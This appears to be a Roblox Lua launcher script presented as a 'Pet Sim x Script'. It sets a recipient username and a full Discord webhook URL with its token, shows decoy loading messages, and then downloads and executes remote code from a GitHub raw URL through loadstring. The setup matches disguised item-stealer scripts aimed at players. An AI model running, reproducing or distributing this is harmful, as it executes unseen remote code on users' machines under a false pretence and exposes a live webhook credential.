1. Username = 770811958
2. 
3. Webhooks = "https://discord.com/api/webhooks/1182953187477557328/eFG_xkP3cKruDBvoVtkp84R66N50MQceBlHw600-mS7Iq-CmW1aDYiZLMQ0-INkDGDuy"
4. 
5.  
6. _G.CustomScriptName = "Pet Sim x Script"
7. 
8.  
9. _G.Text1 = "Script Loaded..."
10. 
11.  
12. _G.Text2 = "Waiting for Script..."
13. 
14.  
15. _G.Text3 = "Checking Scripts..."
16. 
17.  
18. _G.Text4 = "Starting Script..."
19. 
20.  
21. loadstring(game:HttpGet("https://raw.githubusercontent.com/Jopsc/MainOp_script/main/Pet_scriptPetboi"))()
